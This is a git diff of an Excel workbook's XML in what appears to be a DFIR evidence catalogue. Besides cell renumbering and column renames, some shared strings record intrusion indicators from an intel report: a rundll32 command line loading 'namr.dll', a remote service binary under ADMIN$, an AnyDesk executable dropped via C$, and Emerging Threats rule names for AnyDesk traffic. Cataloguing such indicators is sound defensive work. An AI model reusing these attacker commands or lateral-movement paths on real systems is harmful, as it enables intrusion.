+      <c r="D81" s="1"/>
+      <c r="E81" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F81" s="1" t="s">
+        <v>163</v>
+      </c>
+      <c r="G81" s="1" t="s">
+        <v>144</v>
+      </c>
+    </row>
+    <row r="82" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A82" s="1" t="s">
+        <v>176</v>
+      </c>
+      <c r="B82" s="1"/>
+      <c r="C82" s="1"/>
+      <c r="D82" s="1"/>
+      <c r="E82" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F82" s="1" t="s">
+        <v>164</v>
+      </c>
+      <c r="G82" s="1" t="s">
+        <v>144</v>
+      </c>
+    </row>
+    <row r="83" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A83" s="1" t="s">
+        <v>177</v>
+      </c>
+      <c r="B83" s="1"/>
+      <c r="C83" s="1"/>
+      <c r="D83" s="1"/>
+      <c r="E83" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F83" s="1" t="s">
+        <v>165</v>
+      </c>
+      <c r="G83" s="1" t="s">
+        <v>144</v>
+      </c>
+    </row>
+    <row r="84" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A84" s="1" t="s">
+        <v>178</v>
+      </c>
+      <c r="B84" s="1"/>
+      <c r="C84" s="1"/>
+      <c r="D84" s="1"/>
+      <c r="E84" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F84" s="1" t="s">
+        <v>166</v>
+      </c>
+      <c r="G84" s="1" t="s">
+        <v>144</v>
+      </c>
+    </row>
+    <row r="85" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A85" s="1" t="s">
+        <v>185</v>
+      </c>
+      <c r="B85" s="1"/>
+      <c r="C85" s="1"/>
+      <c r="D85" s="1" t="s">
+        <v>226</v>
+      </c>
+      <c r="E85" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F85" s="1" t="s">
+        <v>179</v>
+      </c>
+      <c r="G85" s="1"/>
+    </row>
+    <row r="86" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A86" s="1" t="s">
+        <v>186</v>
+      </c>
+      <c r="B86" s="1"/>
+      <c r="C86" s="1"/>
+      <c r="D86" s="1" t="s">
+        <v>226</v>
+      </c>
+      <c r="E86" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F86" s="1" t="s">
+        <v>180</v>
+      </c>
+      <c r="G86" s="1"/>
+    </row>
+    <row r="87" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A87" s="1" t="s">
+        <v>187</v>
+      </c>
+      <c r="B87" s="1"/>
+      <c r="C87" s="1"/>
+      <c r="D87" s="1"/>
+      <c r="E87" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F87" s="1" t="s">
+        <v>181</v>
+      </c>
+      <c r="G87" s="1"/>
+    </row>
+    <row r="88" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A88" s="1" t="s">
+        <v>188</v>
+      </c>
+      <c r="B88" s="1"/>
+      <c r="C88" s="1"/>
+      <c r="D88" s="1"/>
+      <c r="E88" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F88" s="1" t="s">
+        <v>182</v>
+      </c>
+      <c r="G88" s="1"/>
+    </row>
+    <row r="89" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A89" s="1" t="s">
+        <v>189</v>
+      </c>
+      <c r="B89" s="1"/>
+      <c r="C89" s="1"/>
+      <c r="D89" s="1"/>
+      <c r="E89" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F89" s="1" t="s">
+        <v>183</v>
+      </c>
+      <c r="G89" s="1"/>
+    </row>
+    <row r="90" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A90" s="1" t="s">
+        <v>190</v>
+      </c>
+      <c r="B90" s="1"/>
+      <c r="C90" s="1"/>
+      <c r="D90" s="1"/>
+      <c r="E90" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F90" s="1" t="s">
+        <v>184</v>
+      </c>
+      <c r="G90" s="1"/>
+    </row>
+    <row r="91" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A91" s="1" t="s">
+        <v>207</v>
+      </c>
+      <c r="B91" s="1"/>
+      <c r="C91" s="1"/>
+      <c r="D91" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E91" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F91" s="1" t="s">
+        <v>192</v>
+      </c>
+      <c r="G91" s="1"/>
+    </row>
+    <row r="92" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A92" s="1" t="s">
+        <v>208</v>
+      </c>
+      <c r="B92" s="1"/>
+      <c r="C92" s="1"/>
+      <c r="D92" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E92" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F92" s="1" t="s">
+        <v>191</v>
+      </c>
+      <c r="G92" s="1"/>
+    </row>
+    <row r="93" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A93" s="1" t="s">
+        <v>209</v>
+      </c>
+      <c r="B93" s="1"/>
+      <c r="C93" s="1"/>
+      <c r="D93" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E93" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F93" s="1" t="s">
+        <v>193</v>
+      </c>
+      <c r="G93" s="1"/>
+    </row>
+    <row r="94" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A94" s="1" t="s">
+        <v>210</v>
+      </c>
+      <c r="B94" s="1"/>
+      <c r="C94" s="1"/>
+      <c r="D94" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E94" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F94" s="1" t="s">
+        <v>194</v>
+      </c>
+      <c r="G94" s="1"/>
+    </row>
+    <row r="95" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A95" s="1" t="s">
+        <v>211</v>
+      </c>
+      <c r="B95" s="1"/>
+      <c r="C95" s="1"/>
+      <c r="D95" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E95" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F95" s="1" t="s">
+        <v>195</v>
+      </c>
+      <c r="G95" s="1"/>
+    </row>
+    <row r="96" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A96" s="1" t="s">
+        <v>212</v>
+      </c>
+      <c r="B96" s="1"/>
+      <c r="C96" s="1"/>
+      <c r="D96" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E96" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F96" s="1" t="s">
+        <v>196</v>
+      </c>
+      <c r="G96" s="1"/>
+    </row>
+    <row r="97" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A97" s="1" t="s">
+        <v>213</v>
+      </c>
+      <c r="B97" s="1"/>
+      <c r="C97" s="1"/>
+      <c r="D97" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E97" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F97" s="1" t="s">
+        <v>197</v>
+      </c>
+      <c r="G97" s="1"/>
+    </row>
+    <row r="98" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A98" s="1" t="s">
+        <v>214</v>
+      </c>
+      <c r="B98" s="1"/>
+      <c r="C98" s="1"/>
+      <c r="D98" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E98" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F98" s="1" t="s">
+        <v>198</v>
+      </c>
+      <c r="G98" s="1"/>
+    </row>
+    <row r="99" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A99" s="1" t="s">
+        <v>215</v>
+      </c>
+      <c r="B99" s="1"/>
+      <c r="C99" s="1"/>
+      <c r="D99" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E99" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F99" s="1" t="s">
+        <v>199</v>
+      </c>
+      <c r="G99" s="1"/>
+    </row>
+    <row r="100" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A100" s="1" t="s">
+        <v>216</v>
+      </c>
+      <c r="B100" s="1"/>
+      <c r="C100" s="1"/>
+      <c r="D100" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E100" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F100" s="1" t="s">
+        <v>200</v>
+      </c>
+      <c r="G100" s="1"/>
+    </row>
+    <row r="101" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A101" s="1" t="s">
+        <v>217</v>
+      </c>
+      <c r="B101" s="1"/>
+      <c r="C101" s="1"/>
+      <c r="D101" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E101" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F101" s="1" t="s">
+        <v>201</v>
+      </c>
+      <c r="G101" s="1"/>
+    </row>
+    <row r="102" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A102" s="1" t="s">
+        <v>218</v>
+      </c>
+      <c r="B102" s="1"/>
+      <c r="C102" s="1"/>
+      <c r="D102" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E102" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F102" s="1" t="s">
+        <v>202</v>
+      </c>
+      <c r="G102" s="1"/>
+    </row>
+    <row r="103" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A103" s="1" t="s">
+        <v>219</v>
+      </c>
+      <c r="B103" s="1"/>
+      <c r="C103" s="1"/>
+      <c r="D103" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E103" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F103" s="1" t="s">
+        <v>203</v>
+      </c>
+      <c r="G103" s="1"/>
+    </row>
+    <row r="104" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A104" s="1" t="s">
+        <v>220</v>
+      </c>
+      <c r="B104" s="1"/>
+      <c r="C104" s="1"/>
+      <c r="D104" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E104" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F104" s="1" t="s">
+        <v>204</v>
+      </c>
+      <c r="G104" s="1"/>
+    </row>
+    <row r="105" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A105" s="1" t="s">
+        <v>221</v>
+      </c>
+      <c r="B105" s="1"/>
+      <c r="C105" s="1"/>
+      <c r="D105" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E105" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F105" s="1" t="s">
+        <v>205</v>
+      </c>
+      <c r="G105" s="1"/>
+    </row>
+    <row r="106" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A106" s="1" t="s">
+        <v>222</v>
+      </c>
+      <c r="B106" s="1"/>
+      <c r="C106" s="1"/>
+      <c r="D106" s="1" t="s">
+        <v>225</v>
+      </c>
+      <c r="E106" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F106" s="1" t="s">
+        <v>206</v>
+      </c>
+      <c r="G106" s="1"/>
+    </row>
+    <row r="107" spans="1:7" ht="119" x14ac:dyDescent="0.2">
+      <c r="A107" s="1"/>
+      <c r="B107" s="1"/>
+      <c r="C107" s="1"/>
+      <c r="D107" s="1" t="s">
+        <v>224</v>
+      </c>
+      <c r="E107" s="1"/>
+      <c r="F107" s="1" t="s">
+        <v>223</v>
+      </c>
+      <c r="G107" s="1"/>
     </row>
   </sheetData>
   <phoneticPr fontId="1" type="noConversion"/>

--- a/delta2/lib_e/dfir_osir/dfir_20220808.xlsx
+++ b/delta2/lib_e/dfir_osir/dfir_20220808.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/dfir_osir/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D689297E-3F03-C347-B234-4932579098D7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{23942935-4E0C-4549-8E6A-038236704EDF}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="38400" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="0" yWindow="760" windowWidth="34560" windowHeight="21580" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
@@ -36,20 +36,11 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="438" uniqueCount="227">
-  <si>
-    <t>evidence_object</t>
-  </si>
-  <si>
-    <t>non_standard_meta</t>
-  </si>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="459" uniqueCount="227">
   <si>
     <t>eid</t>
   </si>
   <si>
-    <t>source_type</t>
-  </si>
-  <si>
     <t>map_pid</t>
   </si>
   <si>
@@ -57,9 +48,6 @@
   </si>
   <si>
     <t>dfir20220808-eid0001</t>
-  </si>
-  <si>
-    <t>open source intel report</t>
   </si>
   <si>
     <t xml:space="preserve"> {"process_command_line": r'''C:\Windows\System32\cmd.exe /c start rundll32 namr.dll,IternalJob'''}</t>
@@ -465,9 +453,6 @@
 Below is an example of the service edc603a that was created on a Domain Controller:</t>
   </si>
   <si>
-    <t>{"service_file_name": r'''"\\&lt;FQDN&gt;\ADMIN$\edc603a.exe'''</t>
-  </si>
-  <si>
     <t>dfir20220808-eid0066</t>
   </si>
   <si>
@@ -574,12 +559,6 @@
   </si>
   <si>
     <t>dfir20220808-eid0083</t>
-  </si>
-  <si>
-    <t>{"et_rule": "ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent"}</t>
-  </si>
-  <si>
-    <t>{"et_rule": "ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)"}</t>
   </si>
   <si>
     <t xml:space="preserve"> {"obj_type": "file_create", "file_path": r'''&lt;fqdn&gt;\C$\programdata\AnyDesk (1).exe'''}</t>
@@ -720,10 +699,31 @@
     <t>generic</t>
   </si>
   <si>
-    <t>sigma</t>
-  </si>
-  <si>
     <t>et_rule</t>
+  </si>
+  <si>
+    <t>eid_type</t>
+  </si>
+  <si>
+    <t>object</t>
+  </si>
+  <si>
+    <t>ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent</t>
+  </si>
+  <si>
+    <t>ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software</t>
+  </si>
+  <si>
+    <t>object_sigma</t>
+  </si>
+  <si>
+    <t>{"service_file_name": r'''"\\&lt;FQDN&gt;\ADMIN$\edc603a.exe'''}</t>
+  </si>
+  <si>
+    <t>evidence</t>
+  </si>
+  <si>
+    <t>ns_meta</t>
   </si>
 </sst>
 </file>
@@ -819,10 +819,10 @@
     <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="6"/>
     <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="5"/>
     <tableColumn id="3" xr3:uid="{8046B7CB-F6C5-6D4E-BC1D-63FF3DD3D5BF}" name="map_did" dataDxfId="4"/>
-    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="source_type" dataDxfId="3"/>
-    <tableColumn id="5" xr3:uid="{EB72065A-5D22-8549-8CE0-1A9677239F1C}" name="non_standard_meta" dataDxfId="2"/>
-    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence_object" dataDxfId="1"/>
-    <tableColumn id="2" xr3:uid="{207EDF8E-E395-1D42-A573-5F5B69D0FCE9}" name="description" dataDxfId="0"/>
+    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="3"/>
+    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="2"/>
+    <tableColumn id="2" xr3:uid="{207EDF8E-E395-1D42-A573-5F5B69D0FCE9}" name="description" dataDxfId="1"/>
+    <tableColumn id="8" xr3:uid="{30300E6C-70B6-5F46-8D15-16F2EDD21014}" name="ns_meta" dataDxfId="0"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleMedium15" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
@@ -1147,8 +1147,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
   <dimension ref="A1:G107"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A79" workbookViewId="0">
-      <selection activeCell="D85" sqref="D85:D86"/>
+    <sheetView tabSelected="1" topLeftCell="E1" workbookViewId="0">
+      <selection activeCell="G4" sqref="G4"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -1157,1848 +1157,1890 @@
     <col min="2" max="2" width="21.5" customWidth="1"/>
     <col min="3" max="3" width="14.33203125" bestFit="1" customWidth="1"/>
     <col min="4" max="4" width="13.6640625" bestFit="1" customWidth="1"/>
-    <col min="5" max="5" width="72.6640625" customWidth="1"/>
-    <col min="6" max="6" width="143.33203125" customWidth="1"/>
-    <col min="7" max="7" width="98.1640625" customWidth="1"/>
+    <col min="5" max="5" width="143.33203125" customWidth="1"/>
+    <col min="6" max="6" width="82.6640625" customWidth="1"/>
+    <col min="7" max="7" width="109.83203125" customWidth="1"/>
   </cols>
   <sheetData>
     <row r="1" spans="1:7" x14ac:dyDescent="0.2">
       <c r="A1" t="s">
-        <v>2</v>
+        <v>0</v>
       </c>
       <c r="B1" t="s">
-        <v>4</v>
+        <v>1</v>
       </c>
       <c r="C1" t="s">
-        <v>14</v>
+        <v>10</v>
       </c>
       <c r="D1" t="s">
-        <v>3</v>
+        <v>219</v>
       </c>
       <c r="E1" t="s">
-        <v>1</v>
+        <v>225</v>
       </c>
       <c r="F1" t="s">
-        <v>0</v>
+        <v>8</v>
       </c>
       <c r="G1" t="s">
-        <v>12</v>
+        <v>226</v>
       </c>
     </row>
     <row r="2" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A2" s="1" t="s">
-        <v>6</v>
+        <v>3</v>
       </c>
       <c r="B2" s="1"/>
       <c r="C2" s="1" t="s">
-        <v>15</v>
+        <v>11</v>
       </c>
       <c r="D2" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E2" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F2" s="1" t="s">
-        <v>39</v>
-      </c>
-      <c r="G2" s="1"/>
+        <v>35</v>
+      </c>
+      <c r="F2" s="1"/>
+      <c r="G2" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="3" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A3" s="1" t="s">
-        <v>16</v>
+        <v>12</v>
       </c>
       <c r="B3" s="1"/>
       <c r="C3" s="1" t="s">
-        <v>15</v>
+        <v>11</v>
       </c>
       <c r="D3" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E3" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F3" s="1" t="s">
-        <v>44</v>
-      </c>
-      <c r="G3" s="1"/>
+        <v>40</v>
+      </c>
+      <c r="F3" s="1"/>
+      <c r="G3" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="4" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A4" s="1" t="s">
-        <v>17</v>
+        <v>13</v>
       </c>
       <c r="B4" s="1"/>
       <c r="C4" s="1" t="s">
-        <v>15</v>
+        <v>11</v>
       </c>
       <c r="D4" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E4" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F4" s="1" t="s">
-        <v>40</v>
-      </c>
-      <c r="G4" s="1"/>
+        <v>36</v>
+      </c>
+      <c r="F4" s="1"/>
+      <c r="G4" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="5" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A5" s="1" t="s">
-        <v>18</v>
+        <v>14</v>
       </c>
       <c r="B5" s="1"/>
       <c r="C5" s="1" t="s">
-        <v>15</v>
+        <v>11</v>
       </c>
       <c r="D5" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E5" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F5" s="1" t="s">
-        <v>41</v>
-      </c>
-      <c r="G5" s="1"/>
+        <v>37</v>
+      </c>
+      <c r="F5" s="1"/>
+      <c r="G5" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="6" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A6" s="1" t="s">
-        <v>19</v>
+        <v>15</v>
       </c>
       <c r="B6" s="1"/>
       <c r="C6" s="1" t="s">
-        <v>15</v>
+        <v>11</v>
       </c>
       <c r="D6" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E6" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F6" s="1" t="s">
-        <v>42</v>
-      </c>
-      <c r="G6" s="1"/>
+        <v>38</v>
+      </c>
+      <c r="F6" s="1"/>
+      <c r="G6" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="7" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A7" s="1" t="s">
-        <v>20</v>
+        <v>16</v>
       </c>
       <c r="B7" s="1"/>
       <c r="C7" s="1" t="s">
-        <v>15</v>
+        <v>11</v>
       </c>
       <c r="D7" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E7" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F7" s="1" t="s">
-        <v>43</v>
-      </c>
-      <c r="G7" s="1"/>
+        <v>39</v>
+      </c>
+      <c r="F7" s="1"/>
+      <c r="G7" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="8" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A8" s="1" t="s">
-        <v>21</v>
+        <v>17</v>
       </c>
       <c r="B8" s="1"/>
       <c r="C8" s="1" t="s">
-        <v>15</v>
+        <v>11</v>
       </c>
       <c r="D8" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E8" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F8" s="1" t="s">
-        <v>38</v>
-      </c>
-      <c r="G8" s="1"/>
+        <v>34</v>
+      </c>
+      <c r="F8" s="1"/>
+      <c r="G8" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="9" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A9" s="1" t="s">
-        <v>22</v>
+        <v>18</v>
       </c>
       <c r="B9" s="1"/>
       <c r="C9" s="1" t="s">
-        <v>15</v>
+        <v>11</v>
       </c>
       <c r="D9" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E9" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F9" s="1" t="s">
-        <v>8</v>
-      </c>
-      <c r="G9" s="1"/>
+        <v>4</v>
+      </c>
+      <c r="F9" s="1"/>
+      <c r="G9" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="10" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A10" s="1" t="s">
-        <v>23</v>
+        <v>19</v>
       </c>
       <c r="B10" s="1"/>
       <c r="C10" s="1" t="s">
-        <v>15</v>
+        <v>11</v>
       </c>
       <c r="D10" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E10" s="1" t="s">
         <v>5</v>
       </c>
-      <c r="F10" s="1" t="s">
-        <v>9</v>
-      </c>
-      <c r="G10" s="1"/>
+      <c r="F10" s="1"/>
+      <c r="G10" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="11" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A11" s="1" t="s">
-        <v>24</v>
+        <v>20</v>
       </c>
       <c r="B11" s="1"/>
       <c r="C11" s="1" t="s">
-        <v>15</v>
+        <v>11</v>
       </c>
       <c r="D11" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E11" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F11" s="1" t="s">
-        <v>10</v>
-      </c>
-      <c r="G11" s="1"/>
+        <v>6</v>
+      </c>
+      <c r="F11" s="1"/>
+      <c r="G11" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="12" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A12" s="1" t="s">
-        <v>25</v>
+        <v>21</v>
       </c>
       <c r="B12" s="1"/>
       <c r="C12" s="1" t="s">
-        <v>15</v>
+        <v>11</v>
       </c>
       <c r="D12" s="1" t="s">
+        <v>220</v>
+      </c>
+      <c r="E12" s="1" t="s">
         <v>7</v>
       </c>
-      <c r="E12" s="1" t="s">
-        <v>5</v>
-      </c>
       <c r="F12" s="1" t="s">
-        <v>11</v>
+        <v>9</v>
       </c>
       <c r="G12" s="1" t="s">
-        <v>13</v>
-      </c>
-    </row>
-    <row r="13" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="13" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A13" s="1" t="s">
-        <v>28</v>
+        <v>24</v>
       </c>
       <c r="B13" s="1"/>
       <c r="C13" s="1"/>
       <c r="D13" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E13" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F13" s="1" t="s">
-        <v>26</v>
-      </c>
-      <c r="G13" s="1"/>
-    </row>
-    <row r="14" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+        <v>22</v>
+      </c>
+      <c r="F13" s="1"/>
+      <c r="G13" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="14" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A14" s="1" t="s">
-        <v>29</v>
+        <v>25</v>
       </c>
       <c r="B14" s="1"/>
       <c r="C14" s="1"/>
       <c r="D14" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E14" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F14" s="1" t="s">
-        <v>27</v>
-      </c>
-      <c r="G14" s="1"/>
-    </row>
-    <row r="15" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+        <v>23</v>
+      </c>
+      <c r="F14" s="1"/>
+      <c r="G14" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="15" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A15" s="1" t="s">
-        <v>49</v>
+        <v>45</v>
       </c>
       <c r="B15" s="1"/>
       <c r="C15" s="1"/>
       <c r="D15" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E15" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F15" s="1" t="s">
-        <v>30</v>
-      </c>
-      <c r="G15" s="1"/>
-    </row>
-    <row r="16" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+        <v>26</v>
+      </c>
+      <c r="F15" s="1"/>
+      <c r="G15" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="16" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A16" s="1" t="s">
-        <v>50</v>
+        <v>46</v>
       </c>
       <c r="B16" s="1"/>
       <c r="C16" s="1"/>
       <c r="D16" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E16" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F16" s="1" t="s">
-        <v>31</v>
-      </c>
-      <c r="G16" s="1"/>
+        <v>27</v>
+      </c>
+      <c r="F16" s="1"/>
+      <c r="G16" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="17" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A17" s="1" t="s">
-        <v>51</v>
+        <v>47</v>
       </c>
       <c r="B17" s="1"/>
       <c r="C17" s="1"/>
       <c r="D17" s="1" t="s">
-        <v>7</v>
+        <v>220</v>
       </c>
       <c r="E17" s="1" t="s">
